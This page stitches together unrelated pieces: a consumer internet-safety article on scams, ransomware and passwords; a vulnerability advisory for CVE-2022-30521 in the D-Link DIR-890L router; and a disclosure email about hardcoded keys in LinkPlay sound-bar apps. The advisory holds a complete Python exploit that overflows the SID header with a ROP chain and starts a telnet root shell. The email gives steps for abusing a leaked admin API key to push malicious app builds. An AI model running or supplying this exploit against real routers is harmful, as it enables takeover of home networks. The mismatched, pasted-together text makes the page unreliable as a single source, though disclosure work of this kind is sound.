Earlier this year, a woman in Tennessee was fooled in an online dating scam by a thief who stole $390,000 of her money. Just last month, after the Twitter account of a famous digital artist was hacked, cybercriminals abused the account to send promotions for a fraudulent collaboration between the artist and the luxury brand Lous Vuitton. By selling fake raffle tickets for the promotion, the scammers raked in $438,000 worth of cryptocurrency.

Staying safe in all of these situations can be difficult because, often times, the scammers on the other end are practiced, experienced professionals. Still, there are a few things you can do to best protect yourself from falling for an online scam.

*   **Do not click on links in emails or text messages from unknown senders**. Even if a message _looks_ like it came from a trustworthy source, like a store you often shop at, you should still be wary of any request to get you to hand over credit card or financial information online.
*   **Do not send money to anyone you haven’t met before**. When we spoke with Cindy Liebes of the Cybercrime Support Network about romance scams, she said many victims of romance scams often sent money to people they had never met in person.
*   **Do not trust everything you see online**. This may sound simple, but remember that even trusted sources of authority can have their online accounts hacked or spoofed—after all, why else do you think we see so many cryptocurrency scams centering on bogus Twitter accounts for Elon Musk? Because, at first blush, they look legitimate.

****Don’t ruin your device****

A true story from me, your author. In 2016, I bought a new smartphone that, as part of a promotion, came with an additional smart watch. Getting the smartwatch required sending a separate form and having the watch delivered to my home at a later date.

About a week after I’d sent the form, I received an email allegedly from the United States Postal Service. The email told me that an update on my package—which I believed to be my new smartwatch—could be read in the attached document, which I blindly downloaded and opened.

Lo and behold, the attachment contained ransomware. After just a few minutes, I’d ruined my work laptop. My files were encrypted and inaccessible and the only readable document remaining was a ransom note asking for money.

The worst part about ruining your work laptop is that you don’t even get to take the day off. Working as a reporter, I still had a story to file—I was on deadline! I spent the day reporting and writing an entire article _on my phone_. It was a nightmare that I recommend to no one.

Though my tale is just about ransomware, the truth is that much of today’s malware gets delivered either through malicious attachments or malicious websites. Here are some simple steps you can take to prevent these attacks from happening.

*   **Do not open email attachments from random senders**. You never know if what you’ve just received is actually malware in disguise.
*   **Do scrutinize email attachments of all types**. Even if you’ve received an attachment from someone or some organization that looks legitimate, remember that, in my case, I was fooled by an email that spoofed the USPS. In fact, a few years ago, threat actors managed to insert malicious attachments into _ongoing_ email threads between two trusted parties.
*   **Do run security updates**. Many malware campaigns rely on known vulnerabilities that have yet to be patched by individuals and organizations. The best defense you have to these types of attacks is to stay up to date on your software’s security patches.
*   **Do consider using a browser plugin that flags unsafe websites**. Some browser plugins can warn you if you’re visiting a dangerous website or a website that has been associated with previous malware scams. Consider using one of these plugins if you’re not sure who you can trust online.
*   **Do use a cybersecurity app**. A cybersecurity tool with real-time protection can stop malware before it has a chance to infect your device. This will provide you with the type of cover you need for when you aren’t remembering every best practice, which is okay. Sometimes you click a link you weren’t supposed to. Don’t beat yourself up about it—just get a cybersecurity app to back you up.

****Don’t make it easy for criminals****

A video of Kanye West from 2018 purportedly revealed that the rapper and producer’s iPhone passcode was 000000. Before you laugh, remember that every single year, a list of the top 10 or 20 most-used passwords (as determined through data breaches that revealed account credentials) typically includes “password” and “123456” near the top five placements. And, separately, though the reasons for the devastating SolarWinds breach are many, it’s hard to forget that, according to the company’s CEO, someone protected a critical, internal account with only the password “solarwinds123.”

The lesson here is simple: Don’t give cybercriminals a free pass.

The truth is, that in most cases, cybercriminals will only succeed against the least-defended targets. If you have any basic defenses in place, cybercriminals often won’t bother with a follow-up attempt to breach your device or steal your information—it’s simply too much trouble when they can move on to another potential victim.

Implement these practices—with the help of some tools—to ruin a cyberthief’s day.

*   **Do use strong passwords**. The longer the password the better in today’s world, in which password-cracking is more a function of time than “complexity.”
*   **Do use unique passwords for every account**.Repeat passwords are a huge risk to you because if your data is breached in an attack on one of the services you use, cybercriminals absolutely will try that password and username combo to access other popular services.
*   **Do use a password manager** to help keep track of the dozens of unique passwords you have.
*   **Do use two-factor (also called multi-factor) authentication**. With 2FA or MFA, even if your username and password are leaked, your account will still trigger a notification to your phone if a website recognizes that you are logging in from a different device or place. This can stop cyberthieves in their tracks even if they have your account credentials.
*   **Do use a VPN on public WiFi connections.** A virtual private network, or VPN, will encrypt your traffic, which can be especially helpful when connecting to public WiFi networks which could be vulnerable to eavesdropping. To learn how to choose the best VPN for you, read our advice here.

****Learn from the experiences of others****

The Internet can be a risky place where you can legitimately lose thousands of dollars or entire days’ worth of work. Don’t wait until you’ve made your own mistake to course-correct. Start changing your behavior today to enjoy a safer, better Internet experience.

Internet Safety Month: Avoiding the consequences of unsafe Internet practices

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the D-Link Wi-Fi router firmware DIR-890L DIR890LA1_FW107b09.bin and previous versions. The function created at 0x17958 of /htdocs/cgibin will call sprintf without checking the length of strings in parameters given by HTTP header and can be controlled by users easily. The attackers can exploit the vulnerability to carry out arbitrary code by means of sending a specially constructed payload to port 49152.

**CVE-ID**

CVE-2022-30521

**Information**

**Vendor of the products:**    D-Link

**Reported by:**    WangJincheng(wjcwinmt@outlook.com) && FeiXincheng(FXC030618@outlook.com)

**Affected products:**    D-Link DIR-890L <= v1.07B09

**Vendor Homepage:**    https://www.dlink.com

**Overview**

The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the D-Link Wi-Fi router firmware DIR-890L DIR890LA1_FW107b09.bin and previous versions.

The function created at 0x17958 of /htdocs/cgibin will call sprintf without checking the length of strings in parameters given by HTTP header and can be controlled by users easily.

The attackers can exploit the vulnerability to carry out arbitrary code by means of sending a specially constructed payload to port 49152.

**Vulnerability Description**

The vulnerability is detected at /htdocs/cgibin.

There is a Stack-based Buffer Overflow vulnerability in the function created at 0x17A60. When we use UNSUBSCRIBE request, it will call the sub_17958 function which created at 0x17958.

However, in the sub_17958 function, it will call sprintf without checking the length of v2, which causes the stack overflow. The v2 here is SID parameter given by HTTP header.

**Poc**

\# python3
from pwn import \*
from socket import \*
from os import \*
from time import \*
context(os \= 'linux', arch \= 'arm')

libc\_base \= 0xb6f7e000

s \= socket(AF\_INET, SOCK\_STREAM)

cmd \= b'telnetd -l /bin/sh;'
payload \= b'a'\*449
payload += p32(libc\_base + 0x18298) \# pop {r3, pc};
payload += p32(libc\_base + 0x406f8) \# mov r0, r1; pop {r3, pc};
payload += p32(libc\_base + 0x390fc) \# pc add r1, sp, #0x2c; blx r3;
payload += b'a'\*4 \# padding
payload += p32(libc\_base + 0x5a270) \# pc system
payload += b'a'\*(0x2c\-8) \# padding
payload += cmd

msg \= b"UNSUBSCRIBE /gena.cgi?service=0 HTTP/1.1\\r\\n"
msg += b"Host: localhost:49152\\r\\n"
msg += b"SID: " + payload + b"\\r\\n\\r\\n"

s.connect((gethostbyname("192.168.0.1"), 49152))
s.send(msg)

sleep(1)
system("telnet 192.168.0.1 23")

**Get Shell**

Scan ports before exploit the vulnerability.

Exploit the vulnerability and get shell successfully.

Scan ports again and we can dectect that the port 23 which represents Telnet service has been opened.

CVE-2022-30521: CVE/README.md at main · winmt/CVE

LinkPlay Sound Bar v1.0 allows attackers to escalate privileges via a hardcoded password for the SSL certificate.

From: Lifeng Zhao <lifeng.zhao@linkplay.com> Sent: Sunday, December 12, 2021 5:03 PM To: Hidden Subject: Re: Security Vulnerability \*\*\* The Answer \*\*\* Hi Ohana, Thank you very much for your detailed report on the security vulnerability. It's super helpful and important to us. We'll take the immediate action to fix this. Thank you again for your great support. Best, Lifeng From: Hidden Date: 2021-12-12 21:24 To: security@linkplay.com Subject: Security Vulnerability \*\*\* The vulnerability \*\*\* Bug Type: Hard-coded secret key Impact: RCE, Supply chain attack Platforms: IOS + Android applications Our lab team has reviewed your product from a security perspective and noticed a few security issues that you should be aware of (technical details provided below). It is important to note that CyberArk Labs follow the security industry standard disclosure policy. We allow 90 days for the issues to be fixed/patched/mitigated. CyberArk Labs reserves the right to publicly disclose all information about the issues after this timeframe. We would be happy to share any additional information and to cooperate with you in mitigating the issue in a timely fashion. Summary: We can access an admin user in the Artifactory JFrog system, through which you can manage all the code of the applications and change it. As a result, we can change the application code across multiple tenants, ending with full RCE over every app. It is important to note, however, that both Android and IOS applications suffer from these vulnerabilities In details: We found the API key for admin and the password of the SSL client certificate have been hardcoded and stored on the application SoundBar (com.wifiaudio.Yamaha). To exploit this, you can add the API key to each request sent to the server. 1.Within the SoundBar application, we found the password of certificate\_new\_encrypted.p12 SSL certificate file. Using this certificate, we can communicate with the Soundbar device on port 443. Besides that, we found that the file is encoded with the XOR operator with the number 2. Therefore, it is simple to overcome the encoding. As a result, we can communicate with HTTPS requests with the device. 2. Also, we found that the application sends logs to the URL https://log.linkplay.com:8081/artifactory/Android/logs with the header "X-JFrog-Art-Api, and the API key AKCp5bB…. We discovered this API key is the key of the admin user in the system. This is a major security concern because every malicious user can access the JFrog artifactory with full admin access. In other words, a malicious user can corrupt the repository and cause clients to download malicious applications. 3.Moreover, we noticed that the JFROG version (6.2.0) is not up-to-date. The latest version is (7.10.2). Thus, it is vulnerable to the following CVEs: 1. CVE-2020-7931 2. From the frog website Lastly, we found the vulnerability (the admin API key) in many applications. Below are some links to several apps: ·https://play.google.com/store/apps/details?id=com.medion.speaker ·https://play.google.com/store/apps/details?id=com.wifiaudio.Yamaha ·https://play.google.com/store/apps/details?id=com.wifiaudio.triangle ·https://play.google.com/store/apps/details?id=com.wifiaudio.cavalier ·https://play.google.com/store/apps/details?id=com.wifiaudio.jam ·https://play.google.com/store/apps/details?id=com.wifiaudio.FABRIQ ·https://play.google.com/store/apps/details?id=com.zoundindustries.marshallvoice ·https://play.google.com/store/apps/details?id=com.dpiinc.ISBWV418B ·https://play.google.com/store/apps/details?id=com.ihome.ama ·https://play.google.com/store/apps/details?id=com.wifiaudio.iHome ·https://play.google.com/store/apps/details?id=com.wifiaudio.Creative

Tag

#wifi